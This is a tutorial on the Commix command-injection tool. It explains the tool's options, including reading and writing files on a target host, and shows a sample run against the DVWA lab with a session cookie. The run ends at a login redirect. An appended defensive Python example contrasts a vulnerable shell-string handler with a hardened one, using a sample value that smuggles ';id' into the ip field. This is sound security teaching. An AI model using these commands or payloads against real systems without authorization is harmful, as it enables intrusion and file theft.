
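Introduction to and Usage of the Command Injection Tool Commix

  Commix is a command injection vulnerability testing tool written in Python. It is designed to make it easy to detect whether a request is vulnerable to command injection and to test it.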

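  Common options include:

  Target:

    -u URL, --url=URL                   Target URL, i.e. the URL that may be vulnerable to command injection.

  Request:

    --data=DATA                         Data to submit via POST. A very important parameter.
    --host=HOST                         HTTP Host header. Sets the Host field of the submitted request; usually does not need to be set.
    --user-agent=AGENT                  Sets the User-Agent field of the submitted request, to avoid User-Agent-based filtering by the target site (for example, anti-crawler measures).
    --cookie=COOKIE                     HTTP Cookie header. Sets the Cookie value of the submitted request. A very important parameter: it must be supplied when the URL that may be vulnerable to command injection is only accessible after the user has logged in.
    --headers=HEADERS                   Additional headers (e.g. "Header1: Value1\nHeader2: Value2"). Sets other header fields of the submitted request.

  File access (these options can be used to access files on the target host):

    --file-read=FILE..                  Read the file from the target host. The path of the file to download from the target site.
    --file-write=FIL..                  Write a file on the target host. The path of the file to upload to the target site (this is the local path).
    --file-upload=FI..                  Upload the file on the target host.
    --file-dest=FILE..                  The destination path on the target site for the upload, i.e. the path on the site (absolute path).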

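  The DVWA application in Metasploitable2 is used as the example here. This URL is already known to be vulnerable to command injection: http://192.168.140.137/dvwa/vulnerabilities/exec/#

  Now test the vulnerability with Commix: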

# commix -u 'http://192.168.140.137/dvwa/vulnerabilities/exec/#' --cookie='security=low; PHPSESSID=b33b449bd2cb99c0a1b7693627b5d603' --data='ip=INJECT_HERE&submit=submit'

[warning] Python version 3.9.10 detected. You are advised to use Python version 2.7.x.
                                      __
   ___   ___     ___ ___     ___ ___ /\_\   __  _
 /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v3.3-stable
/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </
\ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\ https://commixproject.com
 \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ (@commixproject)

+--
Automated All-in-One OS Command Injection Exploitation Tool
Copyright © 2014-2021 Anastasios Stasinopoulos (@ancst)
+--

(!) Legal disclaimer: Usage of commix for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

[warning] You haven't updated commix for more than 212 days!
[info] Testing connection to the target URL.
[warning] Got a 302 redirection (http://192.168.140.137/dvwa/login.php).
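
The class of flaw tested above, seen from the defending side, as an added example (not code from the original page, from Commix or from DVWA). It assumes a handler that receives the `ip` POST field shown in `--data` and runs `ping` on it; `naive_command` and `safe_ping_argv` are hypothetical names, and the request bodies are constructed samples.

```python
import ipaddress
from urllib.parse import parse_qs


def naive_command(body):
    """Vulnerable pattern: the raw 'ip' field is pasted into a shell string."""
    ip = parse_qs(body, keep_blank_values=True).get("ip", [""])[0]
    # If this string is handed to a shell, ';', '|', '&' and newlines in the
    # field are interpreted as shell syntax instead of as part of the address.
    return "ping -c 4 " + ip


def safe_ping_argv(body):
    """Hardened pattern: strict parsing, then an argv list with no shell."""
    values = parse_qs(body, keep_blank_values=True).get("ip", [])
    if len(values) != 1:
        raise ValueError("expected exactly one 'ip' field")
    # ip_address() accepts only a literal IPv4/IPv6 address and raises
    # ValueError for anything else, including trailing shell metacharacters.
    addr = ipaddress.ip_address(values[0].strip())
    # Intended for subprocess.run(argv, shell=False): each element reaches the
    # program as one argument and is never re-parsed by a shell.
    return ["ping", "-c", "4", str(addr)]


if __name__ == "__main__":
    # Constructed sample bodies in the same shape as the --data value above.
    samples = [
        "ip=192.168.140.137&submit=submit",
        "ip=127.0.0.1%3Bid&submit=submit",  # %3B decodes to ';'
    ]
    for body in samples:
        print("naive :", repr(naive_command(body)))
        try:
            print("safe  :", safe_ping_argv(body))
        except ValueError as exc:
            print("safe  : rejected:", exc)
```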